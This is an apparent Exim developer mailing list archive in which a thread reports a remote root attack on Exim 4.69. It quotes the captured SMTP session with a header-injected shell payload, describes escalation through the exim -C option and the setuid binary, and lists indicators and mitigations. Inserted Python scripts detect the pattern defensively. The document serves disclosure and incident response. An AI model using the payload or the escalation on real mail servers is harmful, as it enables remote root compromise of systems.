Adam | 7 Dec 2010 10:35

[Bug 230] A number of LDAP-related things

------- You are receiving this mail because: -------
You are the QA contact for the bug.

http://bugs.exim.org/show_bug.cgi?id=230

Nigel Metheringham <nigel <at> exim.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
   Target Milestone|Exim 4.72                   |Exim 4.73

--- Comment #3 from Adam <adam <at> NetBSD.org>  2010-12-07 09:35:53 ---
Created an attachment (id=426)
 --> (http://bugs.exim.org/attachment.cgi?id=426)
Patch for src/lookups/ldap.c to enable LDAP extended features.

-- 
Configure bugmail: http://bugs.exim.org/userprefs.cgi?tab=email

-- 
## List details at http://lists.exim.org/mailman/listinfo/exim-dev Exim details at
http://www.exim.org/ ##

Adam | 7 Dec 2010 10:37

[Bug 230] A number of LDAP-related things

http://bugs.exim.org/show_bug.cgi?id=230

--- Comment #6 from Adam <adam <at> NetBSD.org>  2010-12-07 09:37:55 ---
Created an attachment (id=429)
 --> (http://bugs.exim.org/attachment.cgi?id=429)
Patch for src/globals.c to enable LDAP extended features.


Adam | 7 Dec 2010 10:37

[Bug 230] A number of LDAP-related things

http://bugs.exim.org/show_bug.cgi?id=230

--- Comment #5 from Adam <adam <at> NetBSD.org>  2010-12-07 09:37:24 ---
Created an attachment (id=428)
 --> (http://bugs.exim.org/attachment.cgi?id=428)
Patch for src/readconf.c to enable LDAP extended features.


Sergey Kononenko | 7 Dec 2010 22:59

Remote root vulnerability in Exim

Hi,

While investigating a security breach in my company's network, I
captured (with tcpdump) the sequence of a successful remote root attack through
Exim. It was the Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
didn't find the email of the current maintainer of Exim, so I decided to
write to this mailing list. I don't want to publish all details of the
attack before the developers can investigate and fix the vulnerability.
So I ask the Exim maintainers to contact me and I will send them the complete
captured sequence of the attack.
Here I can put a brief sequence of the attack:

EHLO mail.domain.com
MAIL FROM: <orderruc0e <at> somedomain.com>
RCPT TO: <postmaster <at> targetdomain.com>
DATA
MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
.... 
MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}........
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
..........
about 700000 the same strings
..........
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
MAILbombMAILb
.
MAIL FROM: <orderruc0e <at> somedomain.com>
RCPT TO: <postmaster <at> targetdomain.com>
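The session quoted above has three signals a responder can look for in captured SMTP traffic: an Exim string-expansion item such as `${run{...}}` inside a header value, a shell that reuses an inherited socket descriptor (`exec /bin/sh -i <&3`), and a flood of identical padding lines after the headers. The scanner below is an added example, not code from this post or from Exim; the thresholds, the transcript layout, and the sample session are constructed assumptions modeled on the quoted sequence.

```python
"""Scan client-side SMTP transcripts for the header-based Exim attack pattern.
Added example; the sample transcript below is constructed, not the real capture."""
import re
from collections import Counter

# Exim expansion items that execute code or reach outside the message.
# None of these belongs in a header received from the network.
EXPANSION_ITEMS = re.compile(r"\$\{(run|readsocket|readfile|perl|dlfunc)\s*\{", re.I)
# Interactive shell wired to an inherited file descriptor (the SMTP socket).
FD_SHELL = re.compile(r"exec\s+/bin/sh\s+-i\s+<&\d+")

MAX_HEADER_COUNT = 100        # assumption: tune to local traffic
MAX_HEADER_BYTES = 64 * 1024  # assumption: 64 KiB of headers is already abnormal
MIN_PADDING_REPEATS = 1000    # assumption: same line this often is padding


def split_headers(data):
    """Return (headers, body_lines). Folded continuation lines are joined to the
    previous header; the first empty line or non-header line starts the body."""
    lines = data.replace("\r\n", "\n").split("\n")
    headers = []
    for i, line in enumerate(lines):
        if line == "":
            return headers, lines[i + 1:]
        if line[:1] in (" ", "\t") and headers:
            headers[-1] += "\n" + line
            continue
        if ":" not in line:
            return headers, lines[i:]
        headers.append(line)
    return headers, []


def scan_data_section(data):
    """Findings as (severity, description) for one DATA payload."""
    headers, body = split_headers(data)
    findings = []
    header_bytes = sum(len(h) + 1 for h in headers)
    if len(headers) > MAX_HEADER_COUNT or header_bytes > MAX_HEADER_BYTES:
        findings.append(("medium", "oversized header block: %d headers, %d bytes"
                         % (len(headers), header_bytes)))
    for h in headers:
        name, _, value = h.partition(":")
        name = name.strip()
        if EXPANSION_ITEMS.search(value):
            findings.append(("high", "Exim expansion item in header %r" % name))
        if FD_SHELL.search(value):
            findings.append(("high", "fd-reuse shell in header %r" % name))
    body = [l for l in body if l]
    if body:
        top, n = Counter(body).most_common(1)[0]
        if n >= MIN_PADDING_REPEATS:
            findings.append(("medium", "body padding: one %d-byte line repeated %d times"
                             % (len(top), n)))
    return findings


def data_sections(transcript):
    """Each DATA payload up to the lone '.' terminator line."""
    return re.findall(r"^DATA\r?\n(.*?)^\.\r?$", transcript, re.S | re.M)


def scan_transcript(transcript):
    """One findings list per message in the transcript."""
    return [scan_data_section(s) for s in data_sections(transcript)]


# Constructed transcript modeled on the session quoted in the post.
PADDING = "MAILbomb" * 10
SAMPLE_TRANSCRIPT = (
    "EHLO mail.domain.com\n"
    "MAIL FROM: <sender@somedomain.com>\n"
    "RCPT TO: <postmaster@targetdomain.com>\n"
    "DATA\n"
    + "".join("MAILbombhdr%04d: %s\n" % (i, "M4iLB0mb" * 12) for i in range(1, 55))
    + "HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}"
      "${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}\n"
    + (PADDING + "\n") * 2000
    + ".\n"
      "MAIL FROM: <sender@somedomain.com>\n"
      "RCPT TO: <postmaster@targetdomain.com>\n"
)
BENIGN_TRANSCRIPT = ("EHLO a\nMAIL FROM: <a@b>\nRCPT TO: <c@d>\nDATA\n"
                     "From: a@b\nTo: c@d\nSubject: hi\n\nhello\n.\nQUIT\n")

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_TRANSCRIPT
    for n, f in enumerate(scan_transcript(text), 1):
        print("message %d: %s" % (n, f or "clean"))
```

The expansion-item check is the one that matters: whatever the memory bug turns out to be, the payload only pays off if text under attacker control is later passed through Exim's string expansion, so `${run{` in an inbound header is a high-confidence indicator on its own. The size and padding checks are there because the quoted session relies on a very large message, and they are the ones to tune against local traffic.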

Adam | 7 Dec 2010 10:36

[Bug 230] A number of LDAP-related things

http://bugs.exim.org/show_bug.cgi?id=230

--- Comment #4 from Adam <adam <at> NetBSD.org>  2010-12-07 09:36:50 ---
Created an attachment (id=427)
 --> (http://bugs.exim.org/attachment.cgi?id=427)
Patch for src/globals.h to enable LDAP extended features.


Patrick Cernko | 8 Dec 2010 09:58

Re: Remote root vulnerability in Exim

Hi Sergey, hi list,

On 07.12.2010 22:59, Sergey Kononenko wrote:
> Hi,
> 
> While investigating a security breach in my company's network, I
> captured (with tcpdump) the sequence of a successful remote root attack through
> Exim. It was the Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
> didn't find the email of the current maintainer of Exim, so I decided to
> write to this mailing list. I don't want to publish all details of the
> attack before the developers can investigate and fix the vulnerability.
> So I ask the Exim maintainers to contact me and I will send them the complete
> captured sequence of the attack.

I can fully understand why you do not want to publish details of the
attack, and I support that too. But maybe you could publish extracts from the
logs which might indicate the attack? That way, administrators (like me)
might have a chance to check whether their systems have already been attacked.

> Here I can put a brief sequence of the attack:
> 
> EHLO mail.domain.com
> MAIL FROM: <orderruc0e <at> somedomain.com>
> RCPT TO: <postmaster <at> targetdomain.com>
> DATA
> MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
> .... 
> MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
> HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}........
> MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb

Ted Cooper | 9 Dec 2010 03:18

Re: Remote root vulnerability in Exim

On 08/12/10 18:58, Patrick Cernko wrote:
> I can fully understand why you do not want to publish details of the
> attack and support it too. But maybe you could publish extracts from the
> logs which might indicate the attack? That way, administrators (like me)
> might have a chance to check if their systems are attacked already.

You can check the spool directory for strange files like e.conf or
setuid.

Also, when that e.conf was run, I got a message in my log file that the
queue had been run, when I normally have that turned off. That's only if
the attacker runs it with -q though.

e.g.
2010-12-09 12:03:46 Start queue run: pid=4010
2010-12-09 12:03:46 End queue run: pid=4010


Ted Cooper | 9 Dec 2010 03:27

Re: Remote root vulnerability in Exim

On 08/12/10 07:59, Sergey Kononenko wrote:
> Hi,
> 
> While investigating a security breach in my company's network, I
> captured (with tcpdump) the sequence of a successful remote root attack through
> Exim. It was the Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
> didn't find the email of the current maintainer of Exim, so I decided to
> write to this mailing list. I don't want to publish all details of the
> attack before the developers can investigate and fix the vulnerability.
> So I ask the Exim maintainers to contact me and I will send them the complete
> captured sequence of the attack.
> Here I can put a brief sequence of the attack:

I've had a quick look at this and so far the issue is certainly real enough.

The exim -> root escalation is because the exim user is privileged in
exim and can use the -C command-line option, along with the setuid bit set
on the exim binary. No other users normally have this, but it can be
configured to allow it.

e.g. with a normal user
$ exim -Ce.conf -q
exim: permission denied

Mitigation to prevent the root upgrade can be to remove the setuid bit if
you don't do local deliveries, use the command-line "sendmail" interface,
or anything else that needs it.

A better mitigation is to recompile exim with ALT_CONFIG_PREFIX set to
somewhere that the exim user cannot write to (/etc/exim?), or set
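Ted's two messages give three host-side indicators: files in the spool directory that Exim did not put there (e.conf, setuid), "Start queue run" lines in the main log on a host whose queue runner is switched off, and a setuid-root exim binary that lets a compromised exim user reach root through -C. The triage script below is an added example, not code from the thread or from Exim; the Debian-style paths, the list of expected spool entries, and the sample log lines are assumptions constructed for it.

```python
"""Host triage for the Exim indicators discussed in this thread.
Added example; paths and the expected spool layout are assumptions."""
import os
import re
import stat

# Assumed Debian-style locations; adjust for the local install.
SPOOL_DIR = "/var/spool/exim4"
EXIM_BINARY = "/usr/sbin/exim4"
MAINLOG = "/var/log/exim4/mainlog"

# Top-level spool entries Exim creates itself (assumption: default layout).
KNOWN_SPOOL_ENTRIES = {"db", "input", "msglog", "scan"}

QUEUE_RUN = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (Start|End) queue run: pid=(\d+)")


def unexpected_spool_entries(entries, known=KNOWN_SPOOL_ENTRIES):
    """Names in the spool top level that are not part of the expected layout."""
    return sorted(e for e in entries if e not in known)


def queue_run_starts(log_lines):
    """(timestamp, pid) for each 'Start queue run' line in the main log."""
    starts = []
    for line in log_lines:
        m = QUEUE_RUN.match(line)
        if m and m.group(2) == "Start":
            starts.append((m.group(1), int(m.group(3))))
    return starts


def is_setuid_root(mode, uid):
    """True when the mode carries the setuid bit and the owner is uid 0."""
    return bool(mode & stat.S_ISUID) and uid == 0


def triage(spool_entries, log_lines, binary_mode, binary_uid, queue_runner_enabled):
    """Combine the three checks into a list of human-readable findings."""
    findings = []
    for name in unexpected_spool_entries(spool_entries):
        findings.append("unexpected spool entry: %s" % name)
    if not queue_runner_enabled:
        # Only meaningful where queue runs are normally off, as in Ted's setup.
        for ts, pid in queue_run_starts(log_lines):
            findings.append("queue run at %s (pid %d) on a host with the queue runner off"
                            % (ts, pid))
    if is_setuid_root(binary_mode, binary_uid):
        findings.append("exim binary is setuid root: the exim user can reach root via -C")
    return findings


# Constructed sample data, modeled on the lines quoted in the thread.
SAMPLE_LOG = [
    "2010-12-09 12:03:46 Start queue run: pid=4010",
    "2010-12-09 12:03:46 End queue run: pid=4010",
    "2010-12-09 12:05:01 1PQbQd-0001Zt-8m <= a@b H=(x) [192.0.2.1] P=esmtp S=421",
]
SAMPLE_SPOOL = ["db", "input", "msglog", "e.conf", "setuid"]


def triage_host(queue_runner_enabled=False):
    """Run the checks against the live system using the assumed paths."""
    st = os.stat(EXIM_BINARY)
    with open(MAINLOG, errors="replace") as f:
        lines = f.read().splitlines()
    return triage(os.listdir(SPOOL_DIR), lines, st.st_mode, st.st_uid,
                  queue_runner_enabled)


if __name__ == "__main__":
    try:
        results = triage_host()
    except OSError as e:
        print("live check skipped (%s); sample data follows" % e)
        results = triage(SAMPLE_SPOOL, SAMPLE_LOG, 0o104755, 0, False)
    for r in results:
        print(r)
```

The setuid finding is a configuration fact rather than evidence of compromise, but it is what turns an exim-user foothold into root, so it belongs in the same report as the spool and log checks. The queue-run check is only useful where the administrator knows queue runs are normally off; on a host that runs the queue on a timer, every line will match and the check should be disabled.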

Brad Jorsch | 9 Dec 2010 15:20

Re: Remote root vulnerability in Exim

On Thu, Dec 09, 2010 at 12:27:30PM +1000, Ted Cooper wrote:
> 
> The real issue here is why Exim is treating the HeaderX line like
> trusted configuration data. There must be a buffer overflow but I
> haven't spotted it in the few minutes I've looked at this. I can
> probably find it without the data dump but if someone else can put some
> eyes on this too that would be great. I'm not that good at spotting
> things like this but no-one else has said anything.

I've tried to take a look, but I haven't been able to reproduce it in a
quick attempt.


Ted Cooper | 9 Dec 2010 15:47

Re: Remote root vulnerability in Exim

On 10/12/10 00:20, Brad Jorsch wrote:
> I've tried to take a look, but I haven't been able to reproduce it in a
> quick attempt.

My attempt to hunt it down without the dump ended up being quite
fruitless, except for finding where the headers are read in and the
memory allocated for them. After grabbing the dump from Sergey I
discovered I was thinking far too small about the amount of data that was
being sent.

I'm in the process of attempting to write something to reproduce the
result, but I have a feeling it's going to be based on a very exact
amount of data being sent, which is very dependent on the system exim is
running on.

Is anyone else working on this in the background?
